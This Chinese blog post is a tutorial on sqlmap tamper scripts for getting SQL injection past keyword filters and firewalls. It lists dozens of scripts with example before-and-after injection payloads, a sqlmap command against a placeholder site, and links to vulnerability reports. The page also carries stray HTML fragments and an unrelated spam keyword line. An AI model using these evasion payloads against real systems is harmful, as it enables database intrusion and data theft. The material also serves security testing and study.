<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    sqlmap腳本tamper使用

    一顆小胡椒2022-06-25 07:07:48

    很多時候還是得靜下來分析過濾系統到底過濾了哪些參數,該如何繞過。

    sqlmap中的tamper給我們帶來了很多防過濾的腳本,非常實用,可能有的朋友還不知道怎樣才能最有效的利用tamper腳本。

    當然使用腳本之前需要確定的就是系統過濾了哪些關鍵字,比如單引號、空格、select、union、admin等等。

    所以有的時候我們會發現,注入成功了但是dump不出數據,很可能是select被過濾了等等原因。

    如何判斷使用哪個腳本

    最簡單的辦法就是在url參數中手工帶入關鍵詞,判斷是否被過濾。

    如圖:

    直接加個單引號被過濾,說明注入時單引號是沒法用的。


    空格、等于號都沒有過濾,成功報錯。

    select被過濾。

    以此類推,當sqlmap注入出現問題時,比如不出數據,就要檢查對應的關鍵詞是否被過濾。

    比如空格被過濾可以使用space2comment.py,過濾系統對大小寫敏感可以使用randomcase.py等等。

    下面對于sqlmap的tamper參數詳細講解。

    使用方法

    參考:sqlmap用戶手冊詳解【實用版】:https://www.vuln.cn/2035

    根據實際情況,可以同時使用多個腳本,使用-v參數可以看到payload的變化。

    sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py" -v 3 --dbs

    腳本名:apostrophemask.py


    作用:用utf8代替引號


    Example: ( "1 AND '1'='1" ) '1  AND  %EF%BC%871%EF%BC%87=%EF%BC%871'
    

    Tested against: all

    腳本名:equaltolike.py


    作用:like 代替等號

    Example:

    *  Input:  SELECT   FROM  users  WHERE  id=1

    *    Output  SELECT   FROM  users  WHERE  id  LIKE  1

    案例一: http://wooyun.org/bugs/wooyun-2010-087296

    案例二: http://wooyun.org/bugs/wooyun-2010-074790

    案例三:http://wooyun.org/bugs/wooyun-2010-072489

    腳本名:space2dash.py


    作用:繞過過濾‘=’ 替換空格字符(”),(’ – ‘)后跟一個破折號注釋,一個隨機字符串和一個新行(’ n’)


    Example: ( '1 AND 9227=9227' )  '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
    

    Tested against: * MSSQL * SQLite

    案例一:http://wooyun.org/bugs/wooyun-2010-062878

    腳本名:greatest.py


    作用:繞過過濾’>’ ,用GREATEST替換大于號。

    Example: ( '1 AND A > B'  '1 AND GREATEST(A,B+1)=A'  Tested against: * MySQL 4, 5.0  and  5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

    腳本名:space2hash.py


    作用:空格替換為#號 隨機字符串 以及換行符

    Example:

    *  Input: 1  AND  9227=9227

    *    Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

    Requirement:

    • MySQL Tested against:
    • MySQL 4.0, 5.0

    腳本名:apostrophenullencode.py


    作用:繞過過濾雙引號,替換字符和雙引號。

    Example: tamper( "1 AND '1'='1" ) '1  AND  %00%271%00%27=%00%271'

    Tested against:

    • MySQL 4, 5.0 and 5.5
    • Oracle 10g
    • PostgreSQL 8.3, 8.4, 9.0

    腳本名:halfversionedmorekeywords.py


    作用:當數據庫為mysql時繞過防火墻,每個關鍵字之前添加mysql版本評論

    Example:

    ( "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa" ) "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

    Requirement:

    • MySQL < 5.1

    Tested against:

    • MySQL 4.0.18, 5.0.22

    腳本名:space2morehash.py


    作用:空格替換為 #號 以及更多隨機字符串 換行符

    Example:

    * Input: 1  AND  9227=9227

     Output : 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

    Requirement: * MySQL >= 5.1.13 Tested

    against: * MySQL 5.1.41

    案例一:91ri一篇文章

    腳本名:appendnullbyte.py


    作用:在有效負荷結束位置加載零字節字符編碼

    Example: ( '1 AND 1=1'  '1 AND 1=1%00'

    Requirement:

    • Microsoft Access

    腳本名:ifnull2ifisnull.py


    作用:繞過對 IFNULL 過濾。替換類似’IFNULL(A, B)’為’IF(ISNULL(A), B, A)’

    Example:

    ( 'IFNULL(1, 2)'  'IF(ISNULL(1),2,1)'

    Requirement:

    • MySQL
    • SQLite (possibly)
    • SAP MaxDB (possibly)

    Tested against:

    • MySQL 5.0 and 5.5

    腳本名:space2mssqlblank.py(mssql)


    作用:空格替換為其它空符號

    Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

    Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005

    ASCII table:


    案例一: wooyun.org/bugs/wooyun-2010-062878

    腳本名:base64encode.py


    作用:用base64編碼替換 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

    案例一: http://wooyun.org/bugs/wooyun-2010-060071

    案例二: http://wooyun.org/bugs/wooyun-2010-021062

    案例三: http://wooyun.org/bugs/wooyun-2010-043229

    腳本名:space2mssqlhash.py


    作用:替換空格

    Example: ( '1 AND 9227=9227'  '1%23%0AAND%23%0A9227=9227'  Requirement: * MSSQL * MySQL

    腳本名:modsecurityversioned.py


    作用:過濾空格,包含完整的查詢版本注釋

    Example: ( '1 AND 2>1--'  '1 /*!30874AND 2>1*/--'

    Requirement: * MySQL

    Tested against:

    • MySQL 5.0

    腳本名:space2mysqlblank.py


    作用:空格替換其它空白符號(mysql)

    Example:

    * Input:  SELECT  id  FROM  users

     Output  SELECT %0Bid%0BFROM%A0users

    Requirement:

    • MySQL

    Tested against:

    • MySQL 5.1

    案例一:wooyun.org/bugs/wooyun-2010-076735

    腳本名:between.py


    作用:用between替換大于號(>)

    Example: ( '1 AND A > B--'  '1 AND A NOT BETWEEN 0 AND B--'

    Tested against:

    • Microsoft SQL Server 2005
    • MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

    案例一:wooyun.org/bugs/wooyun-2010-068815

    腳本名:space2mysqldash.py


    作用:替換空格字符(”)(’ – ‘)后跟一個破折號注釋一個新行(’ n’)

    注:之前有個mssql的 這個是mysql的

    Example: ( '1 AND 9227=9227'  '1--%0AAND--%0A9227=9227'

    Requirement:

    • MySQL
    • MSSQL

    腳本名:multiplespaces.py


    作用:圍繞SQL關鍵字添加多個空格

    Example: ( '1 UNION SELECT foobar'  '1 UNION SELECT foobar'

    Tested against: all

    案例一: wooyun.org/bugs/wooyun-2010-072489

    腳本名:space2plus.py


    作用:用+替換空格

    Example: ( 'SELECT id FROM users'  'SELECT+id+FROM+users'  Tested against:  all

    腳本名:bluecoat.py


    作用:代替空格字符后與一個有效的隨機空白字符的SQL語句。然后替換=為like

    Example: ( 'SELECT id FROM users where id = 1'  'SELECT%09id FROM users where id LIKE 1'

    Tested against:

    • MySQL 5.1, SGOS

    腳本名:nonrecursivereplacement.py


    雙重查詢語句。取代predefined SQL關鍵字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

    Example: ( '1 UNION SELECT 2--'  '1 UNIOUNIONN SELESELECTCT 2--'  Tested against:  all

    腳本名:space2randomblank.py


    作用:代替空格字符(“”)從一個隨機的空白字符可選字符的有效集

    Example: ( 'SELECT id FROM users'  'SELECT%0Did%0DFROM%0Ausers'

    Tested against: all

    腳本名:sp_password.py


    作用:追加sp_password’從DBMS日志的自動模糊處理的有效載荷的末尾

    Example: ( '1 AND 9227=9227-- '  '1 AND 9227=9227-- sp\_password'  Requirement: * MSSQL

    腳本名:chardoubleencode.py


    作用: 雙url編碼(不處理以編碼的)

    Example:

    * Input:  SELECT  FIELD  FROM %20TABLE

     Output : %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

    腳本名:unionalltounion.py


    作用:替換UNION ALL SELECT UNION SELECT

    Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

    Requirement: all

    腳本名:charencode.py


    作用:url編碼

    Example:

    *  Input:  SELECT  FIELD  FROM %20TABLE

    *    Output : %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

    tested against:

    • Microsoft SQL Server 2005
    • MySQL 4, 5.0 and 5.5
    • Oracle 10g
    • PostgreSQL 8.3, 8.4, 9.0

    腳本名:randomcase.py


    作用:隨機大小寫 Example:

    • Input: INSERT
    • Output: InsERt

    Tested against:

    • Microsoft SQL Server 2005
    • MySQL 4, 5.0 and 5.5
    • Oracle 10g
    • PostgreSQL 8.3, 8.4, 9.0

    腳本名:unmagicquotes.py


    作用:寬字符繞過 GPC addslashes

    Example:

    * Input: 1′  AND  1=1

     Output : 1%bf%27  AND  1=1–%20

    腳本名:randomcomments.py


    作用:用/**/分割sql關鍵字

    Example:

     INSERT ’ becomes ‘ IN //S//ERT’

    腳本名:charunicodeencode.py


    作用:字符串 unicode 編碼

    Example:

    * Input:  SELECT  FIELD%20FROM  TABLE

     Output : %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

    Requirement:

    • ASP
    • ASP.NET

    Tested against:

    • Microsoft SQL Server 2000
    • Microsoft SQL Server 2005
    • MySQL 5.1.56
    • PostgreSQL 9.0.3

    案例一: wooyun.org/bugs/wooyun-2010-074261

    腳本名:securesphere.py


    作用:追加特制的字符串

    Example: ( '1 AND 1=1'  "1 AND 1=1 and '0having'='0having'"

    Tested against: all

    腳本名:versionedmorekeywords.py


    作用:注釋繞過

    Example:

    * Input: 1  UNION  ALL  SELECT  NULL  NULL , CONCAT( CHAR (58,122,114,115,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,115,114,121,58))#

     Output : 1/*! UNION **! ALL **! SELECT **! NULL */,/*! NULL */,/*!CONCAT*/(/*! CHAR */(58,122,114,115,58),/*!IFNULL*/( CAST (/*! CURRENT_USER */()/*! AS **! CHAR */),/*! CHAR */(32)),/*! CHAR */(58,115,114,121,58))#

    Requirement:

    • MySQL >= 5.1.13

    腳本名:space2comment.py


    作用:Replaces space character (‘ ‘) with comments ‘/**/’

    Example:

    * Input:  SELECT  id  FROM  users

     Output  SELECT //id// FROM /**/users

    Tested against:

    • Microsoft SQL Server 2005
    • MySQL 4, 5.0 and 5.5
    • Oracle 10g
    • PostgreSQL 8.3, 8.4, 9.0

    案例一:wooyun.org/bugs/wooyun-2010-046496

    腳本名:halfversionedmorekeywords.py


    作用:關鍵字前加注釋

    Example:

    * Input: value’  UNION  ALL  SELECT  CONCAT( CHAR (58,107,112,113,58),IFNULL( CAST ( CURRENT_USER ()  AS  CHAR ), CHAR (32)), CHAR (58,97,110,121,58)),  NULL  NULL  AND ‘QDWa’= 'QDWa

    * Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=' QDWa

    Requirement:

    • MySQL < 5.1

    Tested against:

    • MySQL 4.0.18, 5.0.22
    selectsqlmap
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    sqlmap腳本tamper使用
    2022-06-25 07:07:48
    所以有的時候我們會發現,注入成功了但是dump不出數據,很可能是select被過濾了等等原因。如何判斷使用哪個腳本最簡單的辦法就是在url參數中手工帶入關鍵詞,判斷是否被過濾。空格、等于號都沒有過濾,成功報錯。以此類推,當sqlmap注入出現問題時,比如不出數據,就要檢查對應的關鍵詞是否被過濾。
    sqlmap --os-shell原理
    2021-09-24 07:04:41
    前言當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。
    測試鏈接是否能夠訪問 判斷操作系統版本 傳遞一個數組,嘗試爆絕對路徑 指定上傳路徑
    01登錄框存在sql注入:通過前期的信息搜集,發現站點使用thinkphp3.2版本的框架,在登錄頁面驗證存
    前言21年省決賽的SQLITE注入就是用的雙寫繞過,當時是手搓代碼打的,這幾天想起來了,尋思著寫個tamper試試。一開始以為很簡單,后來才發現有很多要注意的點,折磨了挺久。等弄完才明白為什么sqlmap沒有自帶雙寫的tamper,涉及的情況太多,需要根據具體過濾邏輯來寫代碼,沒法做到統一。好,然后就是腳本的完整代碼#!
    作為web滲透界的神器之一,無論是挖掘src或者滲透測試,不少的師傅們都離不開這個工具。他的強大也不只是簡單地自動化注入,后續文章我會逐漸帶大家熟悉這個工具的原理。其實網上已有大佬做了很多的分析,我將更細致更基礎地進行分析。
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    一直以來,都想擺脫sqlmap的束縛,通過自定義腳本來完成某月某天,挖盒子過程中,burpsuite掃出某個sqli,花了點時間測了下,確實有些搞頭。
    sql注入學習筆記
    2022-07-27 16:52:58
    sql注入學習筆記
    url:http://******.com驗證:1.單引號返回物理路徑2.猜解當前表的列數,16列正確并正常
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类